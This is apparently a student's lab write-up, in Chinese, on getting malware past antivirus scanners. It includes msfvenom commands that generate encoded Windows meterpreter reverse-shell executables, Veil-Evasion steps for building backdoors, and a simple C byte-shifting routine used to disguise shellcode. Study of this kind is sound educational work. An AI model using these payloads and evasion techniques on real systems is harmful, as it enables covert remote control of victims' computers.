基于行为的恶意软件检测
有源代码
例如之前注入所用到的反弹端口连接
编码后呢,按理论上讲,编码会降低检出率,大不了多编码几次,总会检不出来。
一次编码;
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b ‘\x00’ LHOST=192.168.1.110 LPORT=5202 -f exe > 20155202.exe
然后测试10次编码,发现并没卵子用。
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=192.168.1.110 LPORT=5202 -f exe > my_v1-10.exe
Metasploitsudo apt-get install veil安装
Veil-Evasion,好像像那么回事
后面好像是在安装python?但是好像出过错,所以我最后直接删除了pythen.
安装完成后,我发现和别人的都不一样,最后我抱着破罐子破摔的心态veil进入程序,然后一路按no,结果居然出现了正确的界面。
veil命令进入应用,输入use evasion进入veil-evasionuse python/meterpreter/rev_tcp.py,然后设置回连IP和端口,生成后门文件:
use python/meterpreter/rev_tcp.py改成use c/meterpreter/rev_tcp.py
Viruscan的扫描结果怎么样吧,这一步我并没直接找到生成的文件,我用了 cp -r 要复制的文件夹绝对地址 /root 命令,将那个文件夹复制到主机root目录下,取出来了.exe程序
扫描。
win7虚拟机不支持vs,所以这个实验被迫在关了360的主机上做的,说实话,崩了好几次,、在VS里编辑编译。
还是一样用Viruscan和360扫描一下
真的是好了不少啊。
我的加壳免杀很简单,因为我认为如果一个算法很优秀,并不是以它的复杂程度来判别的,我运用了上一步中的shellcode的基础上加上了我对每一位进行加一运算,出来了一个很丑的东西,我的算法是这样的:
int main()
{
int i;
char a[500];
for(i=1;i<500;i++)
a[i]=met[i]+1;
for(i=0;i<500;i++)
printf("%x",a[i]);
}
如何自动在别人电脑上把自己加密过的病毒解密释放仍然是一个问题,现在的实验归根结底还是自己把东西拷到别人机器上,别人的ip地址都获取不了,何谈后面的一切?
这次实验真的是花了两天时间,veil的安装问题百出,好在最后成功运行,这次实验分了四个阶段,让我对病毒的认识有了进一步的提升,同时深刻看出了当今杀毒软件的脆弱以及各杀毒软件之间水平的差异,所以,谨慎小心对于我们这个行业的学生来说是非常重要并且安全威胁是近在眼前的!
原文:https://www.cnblogs.com/zx20155202/p/8747952.html